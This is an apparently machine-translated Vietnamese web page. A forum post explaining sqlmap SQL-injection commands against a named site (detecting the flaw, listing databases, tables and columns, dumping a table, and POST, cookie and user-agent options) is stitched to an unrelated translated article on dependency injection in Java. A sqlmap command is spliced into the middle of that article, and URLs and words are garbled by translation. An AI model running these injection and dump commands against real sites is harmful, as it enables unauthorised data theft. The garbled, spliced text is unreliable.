Có bạn ez101 Nói không hiểu bài https. //mũ trắng. vn/forum/thao-luan/. tool-khai-thac
Mình sẽ giải thích các lệnh sử dụng trong bài viết và giới thiệu thêm một số tùy chọn khác của SQLMAP
Đầu tiên SQLMAP bạn có . //công cụ. mũ trắng. vn/download [Cần cài đặt python https. //www. con trăn. org/downloads/]
ok, bắt đầu với lệnh đầu tiên
Lệnh 1
Mã
python sqlmap.py –u “//zerocoolhf.altervista.org/level1.php?id=1” "-u" theo sau là đường dẫn Lệnh này để kiểm tra url trên có dính lỗi sqli khôngMã
python sqlmap.py –u “//zerocoolhf.altervista.org/level1.php?id=1” --dbs Khi đã xác định được url trên bị lỗi, sử dụng flag "--dbs" để liệt kê các databaseMã
python sqlmap.py –u “//zerocoolhf.altervista.org/level1.php?id=1” --tables –D my_zerocoolhf Như trong bài viết đã liệt kê được 2 database là my_zerocoolhf và infomation_schema -D my_zerocoolhf: báo cho sqlmap.py biết chương trình sẽ làm việc với database my_zerocoolhf --table: dùng để liệt kê các bảng trong database my_zerocoolhfMã
python sqlmap.py –u “//zerocoolhf.altervista.org/level1.php?id=1” --columns –D my_zerocoolhf –T book Lệnh 3 đã liệt kê ra các bảng của my_zerocoolhf, lệnh 4 dùng để liệt kê ra tên cột có trong bảng book sự khác biệt giữa -T và --table là --table dùng để liệt kê, -T là lựa chọn để chương trình làm việc với bảng bookMã
python sqlmap.py –u “//zerocoolhf.altervista.org/level1.php?id=1” --dump –D my_zerocoolhf –T book --dump: dùng để dump toàn bộ dữ liệu của bảng bookMã.
--data="DATA" : sử dụng cho phương thức POST, ex: khi login thường hay sử dụng python sqlmap.py -u "url/path" --data "user=mark&passwd=line"Mã
--cookie="cookie" : sử dụng khi lỗ hổng nằm trong cookieMã
--user-agent=AGENT : có thể ứng dụng kiểm tra trường user-agent trong header nên tùy chọn --user-agent sử dụng trong trường hợp này ex: python sqlmap.py -u "url/path" --data "user=mark&passwd=line" --user-agent "Mozilla/5.0 [Linux; ; ] AppleWebKit/ [KHTML, like Gecko] Chrome/ Mobile Safari/"
[user-agent của chrome trên android]Mã
________số 8
Còn rất nhiều tùy chọn hữu ích thông thường được sử dụng để khai thác sqli bằng sqlmap, có thể tham khảo thêm tại https. //github. com/sqlmapproject/sqlmap/wiki/Usage hoặc sử dụng python sqlmap. py --helpChúc các mem nữ 8. 3 vui vẻ
nonellld
Bài viết được dịch từ. https. //Trung bình. freecodecamp. org/a-quick-intro-to-dependency-injection-cái-nó-là-và-khi-dùng-nó-7578c84fa88f
Giới thiệu
Theo như định nghĩa của Wikipedia
Dependency injection là một kỹ thuật trong đó một đối tượng [hoặc một phương thức tĩnh] cung cấp các phụ thuộc của một đối tượng khác. Một phụ thuộc là một đối tượng có thể sử dụng [một dịch vụ]. Tuy nhiên định nghĩa trên vẫn khá là khó hiểu, vậy nên hãy cùng tìm hiểu để hiểu rõ hơn về nó nào
Phụ thuộc hay phụ thuộc nghĩa là phụ thuộc vào sự hỗ trợ của một cái gì, việc gì đó. Ví dụ như nếu chúng ta phụ thuộc quá nhiều vào điện thoại thông minh, thì có thể hiểu là chúng ta phụ thuộc vào điện thoại thông minh
Trước khi nói về sự phụ thuộc injection, hãy hiểu sự phụ thuộc trong lập trình nghĩa là gì trc'
Khi lớp A sử dụng một số chức năng của lớp B, thì có thể nói là lớp A có quan hệ phụ thuộc với lớp B.
Trong java, trước khi ta có thể sử dụng phương thức của lớp khác, ta phải khởi tạo một đối tượng của lớp đó [hoặc A cần phải tạo 1 thực thể của B]
Do đó ta có thể hiểu, việc chuyển giao nhiệm vụ khởi động đối tượng đó cho một ai khác và trực tiếp sử dụng các phụ thuộc được gọi là tiêm phụ thuộc.
Tại sao chúng ta cần sử dụng tiêm phụ thuộc?
Ví dụ chúng ta có một loại Xe hơi, trong đó có một vài đối tượng khác như Bánh xe, Pin
class Car{
private Wheels wheel = new MRFWheels[];
private Battery battery = new ExcideBattery[];
...
...
}
Tại đây, lớp Car chịu trách nhiệm khởi tạo tất cả các đối tượng phụ thuộc. Nhưng chuyện gì sẽ xảy ra nếu chúng ta muốn bỏ qua MRFWheel và thay thế bằng YokohamaWheel
Chúng ta sẽ cần tạo một lớp Xe mới với YokohamaWheel, tuy nhiên khi sử dụng phép tiêm phụ thuộc, chúng ta có thể thay đổi Bánh xe trong thời gian chạy vì sự phụ thuộc có thể được đưa vào [tiêm] trong thời gian chạy thay vì thời gian biên dịch
Bạn có thể hiểu là tiêm phụ thuộc là một người trung gian chịu trách nhiệm tạo ra các loại bánh xe khác nhau, rồi cung cấp cho chúng tôi lớp Xe. Việc đó làm cho lớp Xe không phải phụ thuộc vào Wheel cụ thể nào hay Pin cụ thể nào nữa
Về cơ bản có 3 loại tiêm phụ thuộc
- xây dựng tiêm. các phụ thuộc được cung cấp thông qua hàm tạo của lớp
- tiêm setter. khách hàng tạo ra một phương thức setter cho các lớp khác có thể sử dụng chúng để cấp độ phụ thuộc
- tiêm giao diện. sự phụ thuộc sẽ cung cấp một bộ tiêm hàm để đưa nó vào bất kỳ máy khách bất kỳ nào được truyền vào. Các máy khách phải triển khai một giao diện có một phương thức setter dành cho việc nhận phụ thuộc
python sqlmap.py –u “//zerocoolhf.altervista.org/level1.php?id=1” --dbs Khi đã xác định được url trên bị lỗi, sử dụng flag "--dbs" để liệt kê các databaseDo đó trách nhiệm của tiêm phụ thuộc là
- Create the object
- Biết được lớp nào cần những đối tượng đó
- Cung cấp cho những lớp mà những đối tượng chúng ta cần
Bằng cách này, nếu trong đối tượng tương lai có sự thay đổi, thì dependency injection có nhiệm vụ cấp lại những đối tượng cần thiết cho lớp